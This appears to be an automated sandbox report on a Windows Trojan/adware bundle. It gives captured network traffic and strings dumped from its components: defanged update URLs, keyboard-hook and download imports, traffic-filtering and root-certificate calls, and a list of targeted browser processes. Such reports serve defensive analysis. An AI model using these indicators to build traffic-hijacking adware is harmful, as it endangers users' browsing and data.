User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive

GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:22 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
PK........}*.F.}&A............479.jsonS...=Uu......u~. .......6~..&.z.
.e......s....^s&<..O....E...=...kgs..m.2..j.%.P.g..._...S>...C^.
........Y...$.L..`..UtZ.... wm..L:...0>....:=.]..... \.^\9Y8yka`.k.
m.f.96..a..f.k.&...%.........?..Q.....w4....k;q....c.V......<.jOn..
`Y.qm..]..........yq.#D.D.l..C..u{'.8.....T7]zI..{.......WQ.*z|....e..
l..v.....c..:g....'..b.q~..wH.=U~.Y.{.....7.N....T.s.4.L..s..6q..f_...
nY...../.l?=-i...y.m~E.../.u.MQ ...S~......^....i.G{.........2...y....
......-.ya...ss.."....s~...........'.p..".....G.....-#..G~....q..PK...
.....}*.F.........<......uninstallDlg2.xml.[[email protected]..
...4..Z..".%.fW&U......7.(Y...\s.].v.X.4.....3b..._%....r6...m!.".S..Z
...gl.Lb...32..Hf..^.....)........O..;q-..T.....z6.......s&#.p1.>..
.......|....1..Y......%; t..xjI...Q...M.9N2.<;@.~.p....\..A....\..u
.....Q%...u..e.... ..'9\........\~.. .!I......v....x.t_D.$Bw0.V.......
4..8...Es....0L..lF..ET..8... p.k-x..qR.....~Kn.gK..'.d....%;...%GK..B
.k.[.w....H.$y.Em.R...:Y.....l.v#..(.d.....ntgA....4.j.{m.W.3V.=.O(.c.
...P.WT:X.?2.E.....>..k...=......7b~.]..`.....(.............2_.L...
...:@...F...M......1..".9X.....c.!3H%...d...41E2./H...p....R.3........
1`[email protected].,.-C..2..)[email protected]...<....r9.
.../.],!.*...M9..cO.h..c..Fr..`......3....<..Q....V.*.~.....5....S.
..I..nj..Q.A.. .....bn.2!.9$ .....U%.....p....v.-*.. *C7{...F......4wj
..2...2.k....tU'63....r.m.~............a.S....W..V ...z..u.~.s...gg...
Z\q..'F.8..Rm..V.kT.. E^X)j..QU*>y..\.j.....$...x.=.....kI.-..p
<<< skipped >>>


GET /gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1493
Connection: keep-alive
Set-Cookie: __cfduid=d9475cef6091554b34cfafc407203a1381430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 8fc8d7ab1aa7313fa97fcb4c95a3d6ccbfe23096
Expires: Thu, 30 Apr 2015 23:19:16 GMT
Last-Modified: Thu, 30 Apr 2015 11:19:16 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edbd501301b1-FRA
0..........0..... .....0......0...0.......0?.....!...>., ......2015
0430111916Z0u0s0K0... ........)[email protected]...^./.....
2k...!'=e.,.KdXe.I..6m....20150430111916Z....20150430231916Z0...*.H...
......... m.......#%F...x...hbV..x.MD.<.F....k.U..v......C]......&g
t;1..Iq.3...[Kp>.. .......S.M.Da.. .3]f~/.*.o.9...h.G...r~..B.*.,..
.{..wx...)[email protected].....!>..t...;.7...m}...|_..).->2......$
..o.?.&*.2.....}[email protected]<h...L...}....o.......s
ea....0...0...0...........!.}.*./..(.....C.0...*.H........0Z1.0...U...
.BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - S
HA256 - G20...150318093923Z..150618083923Z0..1.0...U....BE1.0...U....G
lobalSign nv-sa1C0A..U...:GlobalSign CodeSigning CA - SHA256 - G2 OCSP
 responder - 21.0...U....201503181039000.."0...*.H.............0......
....]W0..;Cq..t....H.mQ...C.PN...0...Z.p`xT`...g...^c.`....&S..<.w.
......o&..,...n=.{i`\....Fhn.....i%.b,.IS... .]...Vh...~._i.Y......sF%
...I..V.I]Kn.x.....h........)...5..F.6m0;....l..B..d-.ha...>T._.o.7
...."..e....~5a...=..9.h'F>.X...k.l....gCC'[email protected].
..U....0.0...U...........0...U.%..0... .......0... .....0......0...U..
.....0?.....!...>., ....0...U.#..0....J.Z.M1...^./.....2k0...*.H...
..............&..Y.7).!......9s..~.N..4..uz.t.K2Y..=. ... .........W..
8......9t.D........V.d)...s.. ..4.v~r{~..*..&..}............D../TE.t.&
V.e.........l..1........y...--=|~..z..3j1..\..<..~..6.[.Z}'[email protected]._.
..,r..T...W.K.<.<m...;z...k.=F..5........|Z..g.!......p...!.
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_1512:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
pData\Local\Temp\nscD154.tmp\nsWeb.dll
ai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe
t.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181<1@1
t%SSj
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExA
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
registry.dll
_CopyKey
_CreateKey
_DeleteKey
_DeleteKeyEmpty
_KeyExists
_MoveKey
_RestoreKey
_SaveKey
.reloc
System.dll
callback%d
@.reloc
8%ud'
.bu)o&
g\=.jeD
nscD154.tmp
pData\Local\Temp\nscD154.tmp
00663296
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsmD142.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
-2046754816
-2147410511
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="highestAvailable" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s /s "%s"
regedit.exe
REG_KEY
%s%s%s
x,
=hex(%x):
=dword:x
="%s"
[%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
5.9.1.7

%original file name%.exe_1512_rwx_003F4000_00001000:




callback%d

g3CvT78vSMa0N0LPai7Qvt_mb_1.exe_1884:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
pData\Local\Temp\nssD4BE.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll
%Program Files%
\nsWeb.dll
hXXp://goo.gl/Bw14Po
$$\wininit.ini
@.reloc
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181<1@1
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
nssD4BE.tmp
:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nscD4AC.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
8.9.3.9

WNet.exe_3080:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
I<.oS8"
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

CashReminder.exe_1108:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_StoreList.txt
\P_CheckUpdate.txt
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

GOSafer.exe_3284:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\G_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\gs_update.exe
hXXp://VVV.gosaferllc.com/services/rules.txt?dummy=
hXXp://VVV.gosaferllc.com/services/update.php?v=
&key=
\G_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start GOSafer
cmd.exe /c net stop GOSafer
c:\log.log
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

ActSys.exe_3756:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
UhWEB
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeyword<
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx4D
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute<XE
iexplore.exe
firefox.exe
chrome.exe
safari.exe
opera.exe
netscape.exe
torch.exe
seamonkey.exe
k-meleon.exe
konqueror.exe
maxthon.exe
flock.exe
lunascape.exe
amaya.exe
midori.exe
kidzui.exe
rockmelt.exe
sbrowser.exe
slimbrowser.exe
kidrocket.exe
epic.exe
ironbrowser.exe
comodo.exe
comododragon.exe
crazybrowser.exe
arora.exe
shenzbrowser.exe
enigmabrowser.exe
avant.exe
avantbrowser.exe
orca.exe
xbbrowser.exe
xbrowser.exe
sleipnir.exe
spacetime.exe
3dbrowse.exe
bitty.exe
java.exe
grail.exe
lynx.exe
twb.exe
tt.exe
pinkbrowser.exe
nuke.exe
acoo.exe
palemoon.exe
slimboat.exe
dooble.exe
menubox.exe
chromium.exe
ultrabrowser.exe
zac.exe
kylo.exe
morequick.exe
wyzo.exe
xombrero.exe
qupzilla.exe
cometbird.exe
qtweb.exe
deepnet.exe
xtravo.exe
smartbro.exe
jumpto.exe
weblock4kids.exe
weblock.exe
comodoice.exe
srwareiron.exe
srware.exe
coolnovo.exe
cool.exe
qup.exe
browseme.exe
swiftfox.exe
omniweb.exe
omni.exe
spark.exe
bobrowser.exe
crossbrowser.exe
crossbrowse.exe
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
5l6O6W6
3?3
:!:%:6:>:
;$<(<,<0<
: :$:(:,:
5-55595P5u5}5
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
